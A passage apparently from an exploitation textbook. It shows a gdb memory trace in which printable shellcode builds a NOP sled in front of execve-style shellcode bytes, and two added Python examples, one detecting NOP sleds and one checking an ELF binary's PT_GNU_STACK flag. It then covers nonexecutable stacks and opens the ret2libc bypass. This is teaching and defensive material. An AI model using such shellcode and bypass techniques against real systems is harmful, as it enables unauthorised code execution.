(gdb) stepi 10
0xbffff9c4 in ?? ()
(gdb) x/24x 0xbffff9ba
0xbffff9ba: 0x50505050 0x50505050 0x50505050 0x50505050
0xbffff9ca: 0x50505050 0x00000050 0x00000000 0x00000000
0xbffff9da: 0x90900000 0x90909090 0x90909090 0x90909090
0xbffff9ea: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9fa: 0x90909090 0x90909090 0x90909090 0x31909090
0xbffffa0a: 0x31db31c0 0xa4b099c9 0x0b6a80cd 0x2f685158
(gdb) stepi 5
0xbffff9c9 in ?? ()
(gdb) x/24x 0xbffff9ba
0xbffff9ba: 0x50505050 0x50505050 0x50505050 0x90905050
0xbffff9ca: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9da: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9ea: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9fa: 0x90909090 0x90909090 0x90909090 0x31909090
0xbffffa0a: 0x31db31c0 0xa4b099c9 0x0b6a80cd 0x2f685158
(gdb)
Now the execution pointer (EIP) can flow over the NOP bridge into the
constructed shellcode.
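From the defender's side, the thing that stands out in those two memory dumps is the long run of 0x90 bytes in front of the code: a NOP sled of that length is exactly what input filters and intrusion detection signatures have keyed on for years. The following Python is an added example (not from the book) that parses the gdb x/24x output shown above into a byte image and reports the longest NOP run and the address where it begins; the threshold in flag_sled() and the two embedded dumps are constructed for the example, and the dump text is copied from the transcript above.

```python
import re
import struct

# Constructed samples: the two "x/24x 0xbffff9ba" dumps from the gdb transcript above.
GDB_DUMP_BEFORE = """\
0xbffff9ba: 0x50505050 0x50505050 0x50505050 0x50505050
0xbffff9ca: 0x50505050 0x00000050 0x00000000 0x00000000
0xbffff9da: 0x90900000 0x90909090 0x90909090 0x90909090
0xbffff9ea: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9fa: 0x90909090 0x90909090 0x90909090 0x31909090
0xbffffa0a: 0x31db31c0 0xa4b099c9 0x0b6a80cd 0x2f685158
"""

GDB_DUMP_AFTER = """\
0xbffff9ba: 0x50505050 0x50505050 0x50505050 0x90905050
0xbffff9ca: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9da: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9ea: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9fa: 0x90909090 0x90909090 0x90909090 0x31909090
0xbffffa0a: 0x31db31c0 0xa4b099c9 0x0b6a80cd 0x2f685158
"""

# One gdb line: an address, a colon, then one or more 32-bit words in hex.
LINE_RE = re.compile(r"^\s*(0x[0-9a-fA-F]+):((?:\s+0x[0-9a-fA-F]{8})+)\s*$")


def parse_gdb_words(dump):
    """Turn gdb 'x/Nx' output into (base_address, bytes) in memory order.

    gdb prints each 4-byte word as a little-endian integer, so the word
    0x31909090 occupies memory as the bytes 90 90 90 31.
    """
    base = None
    expected = None
    buf = bytearray()
    for line in dump.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # skip prompts and other non-dump lines
        addr = int(m.group(1), 16)
        if base is None:
            base = addr
        elif addr != expected:
            raise ValueError("dump is not contiguous at 0x%x" % addr)
        words = [int(w, 16) for w in m.group(2).split()]
        for w in words:
            buf += struct.pack("<I", w)   # little-endian word -> memory-order bytes
        expected = addr + 4 * len(words)
    if base is None:
        raise ValueError("no gdb dump lines found")
    return base, bytes(buf)


def longest_nop_run(dump, nop=0x90):
    """Return (start_address, length) of the longest run of `nop` bytes, or (None, 0)."""
    base, data = parse_gdb_words(dump)
    best_start, best_len = None, 0
    cur_start, cur_len = None, 0
    for i, b in enumerate(data):
        if b == nop:
            if cur_len == 0:
                cur_start = i
            cur_len += 1
            if cur_len > best_len:
                best_start, best_len = cur_start, cur_len
        else:
            cur_len = 0
    if best_len == 0:
        return None, 0
    return base + best_start, best_len


def flag_sled(dump, threshold=32):
    """Classic IDS heuristic: a NOP run at or above the threshold is suspicious."""
    _, length = longest_nop_run(dump)
    return length >= threshold


if __name__ == "__main__":
    for name, dump in (("before", GDB_DUMP_BEFORE), ("after", GDB_DUMP_AFTER)):
        start, length = longest_nop_run(dump)
        print("%s: %d NOP bytes starting at 0x%x, flagged=%s"
              % (name, length, start, flag_sled(dump)))
```

The second dump, where the NOP bridge is complete, yields a single run of 65 bytes starting at 0xbffff9c8; the first dump, taken before the bridge was finished, still contains a 45-byte run. A threshold-based check like this is cheap and catches textbook sleds, which is also why attackers vary the filler bytes; a production detector would look for runs of any single-byte no-op instruction, not just 0x90.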
Printable shellcode is a technique that can open some doors. It and
all the other techniques we discussed are just building blocks that can be
used in a myriad of different combinations. Their application requires some
ingenuity on your part. Be clever and beat them at their own game.
0x6a0 Hardening Countermeasures
The exploit techniques demonstrated in this chapter have been around for
ages. It was only a matter of time before programmers came up with some
clever protection methods. An exploit can be generalized as a three-step
process: First, some sort of memory corruption; then, a change in control
flow; and finally, execution of the shellcode.
0x6b0 Nonexecutable Stack
Most applications never need to execute anything on the stack, so an obvious
defense against buffer overflow exploits is to make the stack nonexecutable.
When this is done, shellcode inserted anywhere on the stack is basically useless.
This type of defense will stop the majority of exploits out there, and it is
becoming more popular. The latest version of OpenBSD has a nonexecutable
stack by default, and a nonexecutable stack is available in Linux through PaX,
a kernel patch.
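On Linux the decision of whether a process gets an executable stack is recorded in the binary itself, in the PT_GNU_STACK program header: the linker marks it RW when every object was built without executable-stack requirements, and RWX otherwise; a binary with no such header at all is historically given an executable stack on x86. The following Python is an added example (not from the book) that reads that header directly, the same check that readelf -l performs when it prints the GNU_STACK line. The build_elf() helper and the images it produces are constructed samples for the example, not real binaries; the parser itself works on any ELF32 or ELF64 file read into memory.

```python
import struct

PT_LOAD = 1
PT_GNU_STACK = 0x6474E551          # from the ELF/GNU ABI; carries the stack permissions
PF_X, PF_W, PF_R = 1, 2, 4


def gnu_stack_flags(elf):
    """Return p_flags of the PT_GNU_STACK header, or None if the image has none."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = elf[4], elf[5]
    end = {1: "<", 2: ">"}[ei_data]               # EI_DATA: 1 = little-endian, 2 = big-endian
    if ei_class == 2:                             # ELFCLASS64
        hdr = struct.unpack_from(end + "HHIQQQIHHHHHH", elf, 16)
        ph_fmt = end + "IIQQQQQQ"                 # type, flags, offset, vaddr, paddr, filesz, memsz, align
        flags_index = 1
    elif ei_class == 1:                           # ELFCLASS32
        hdr = struct.unpack_from(end + "HHIIIIIHHHHHH", elf, 16)
        ph_fmt = end + "IIIIIIII"                 # type, offset, vaddr, paddr, filesz, memsz, flags, align
        flags_index = 6
    else:
        raise ValueError("unknown EI_CLASS %d" % ei_class)
    e_phoff, e_phentsize, e_phnum = hdr[4], hdr[8], hdr[9]
    for i in range(e_phnum):
        ph = struct.unpack_from(ph_fmt, elf, e_phoff + i * e_phentsize)
        if ph[0] == PT_GNU_STACK:
            return ph[flags_index]
    return None


def stack_is_executable(elf):
    """True if the loader would give this binary an executable stack."""
    flags = gnu_stack_flags(elf)
    if flags is None:
        return True      # no PT_GNU_STACK: x86 Linux historically falls back to an executable stack
    return bool(flags & PF_X)


def build_elf(bits, stack_flags=None):
    """Construct a minimal ELF image with one PT_LOAD and an optional PT_GNU_STACK.
    Constructed sample for the example only; it is not a loadable program."""
    phdrs = [(PT_LOAD, PF_R | PF_X, 0, 0x400000, 0x400000, 0x1000, 0x1000, 0x1000)]
    if stack_flags is not None:
        phdrs.append((PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16))
    if bits == 64:
        ehsize, phentsize = 64, 56
        ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)   # class 64, LSB, version 1, SysV ABI
        body = b"".join(struct.pack("<IIQQQQQQ", t, f, off, va, pa, fs, ms, al)
                        for (t, f, off, va, pa, fs, ms, al) in phdrs)
        hdr = struct.pack("<16sHHIQQQIHHHHHH", ident, 2, 62, 1, 0x400000,
                          ehsize, 0, 0, ehsize, phentsize, len(phdrs), 0, 0, 0)
    else:
        ehsize, phentsize = 52, 32
        ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)   # class 32, LSB, version 1, SysV ABI
        body = b"".join(struct.pack("<IIIIIIII", t, off, va, pa, fs, ms, f, al)
                        for (t, f, off, va, pa, fs, ms, al) in phdrs)
        hdr = struct.pack("<16sHHIIIIIHHHHHH", ident, 2, 3, 1, 0x8048000,
                          ehsize, 0, 0, ehsize, phentsize, len(phdrs), 0, 0, 0)
    return hdr + body


if __name__ == "__main__":
    samples = {
        "64-bit, GNU_STACK RW":   build_elf(64, PF_R | PF_W),
        "64-bit, GNU_STACK RWX":  build_elf(64, PF_R | PF_W | PF_X),
        "32-bit, no GNU_STACK":   build_elf(32),
        "32-bit, GNU_STACK RW":   build_elf(32, PF_R | PF_W),
    }
    for name, image in samples.items():
        print("%-24s executable stack: %s" % (name, stack_is_executable(image)))
```

To run the same check on a real file, read it with open(path, "rb").read() and pass the bytes to stack_is_executable(); readelf -lW on the file shows the GNU_STACK line it is reading. A binary that comes out RWX is usually the result of one object (often hand-written assembly) linked without a .note.GNU-stack section; relinking with -z noexecstack, or fixing that object, removes the executable flag, and a PaX or similar kernel can refuse the executable mapping regardless of what the header asks for.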
0x6b1 ret2libc
Of course, there exists a technique used to bypass this protective
countermeasure. This technique is known as returning into libc. libc is a standard C
library that contains various basic functions, such as printf() and exit(). These